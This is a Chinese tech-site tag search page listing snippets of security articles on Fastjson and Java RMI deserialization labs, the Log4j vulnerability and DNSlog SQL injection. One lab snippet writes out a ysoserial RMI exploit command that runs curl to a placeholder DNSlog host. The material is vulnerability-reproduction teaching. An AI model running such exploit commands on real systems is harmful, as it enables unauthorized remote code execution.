网站首页 站内搜索

搜索结果

查询Tags标签: DNSlog,共有 5条记录
  • Fastjson 1.2.24反序列化漏洞

    1.靶场采用Vulhub,一键启动fastjson漏洞环境 2.java jdk采用1.8.0_281 2.1.mkdir /opt/java 2.2.tar zxvf jdk-8u281-linux-x64.tar.gz -C /opt/java2.3.vim /etc/profile   末尾添加:   export JAVA_HOME=/opt/java/jdk1.8.0_281   export JRE_HOME=/opt/java/…

    2022/3/6 6:15:27 人评论 次浏览
  • Apache Log4j爆“核弹级“漏洞,对众多java应用平台造成影响,已发现近万次攻击

    昨晚对很多java程序员来说可能是个不眠之夜,面对突发的Log4j漏洞,很多公司都需要采取应急措施。改漏洞一旦被攻击者利用,将会造成无法估量的危害近日,一个受到全球广泛使用的组件Apache Log4j被曝出现一个可利用的高危漏洞。攻击者只需要一段代码就可以远程控制受害者…

    2021/12/10 22:20:50 人评论 次浏览
  • Apache Log4j爆“核弹级“漏洞,对众多java应用平台造成影响,已发现近万次攻击

    昨晚对很多java程序员来说可能是个不眠之夜,面对突发的Log4j漏洞,很多公司都需要采取应急措施。改漏洞一旦被攻击者利用,将会造成无法估量的危害近日,一个受到全球广泛使用的组件Apache Log4j被曝出现一个可利用的高危漏洞。攻击者只需要一段代码就可以远程控制受害者…

    2021/12/10 22:20:50 人评论 次浏览
  • Java RMI Registry 反序列化漏洞(<=jdk8u111)

    漏洞复现 先去这http://www.dnslog.cn/搞个dns 然后用这个命令: java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.RMIRegistryExploit your-ip 1099 CommonsCollections6 "curl your-dnslog-server"然后刷新dnslog 好兄弟们你们看懂了吗?反正我…

    2021/7/3 12:21:51 人评论 次浏览
  • SQL注入——DNSlog注入,限制有点大

    DNSlog注入 原理:首先需要有一个可以配置的域名,比如:ceye.io,然后通过代理商设置域名 ceye.io 的 nameserver 为自己的服务器 A,然后再服务器 A 上配置好 DNS Server,这样以来所有 ceye.io 及其子域名的查询都会到 服务器 A 上,这时就能够实时地监控域名查询请求了…

    2021/6/21 2:30:56 人评论 次浏览
扫一扫关注最新编程教程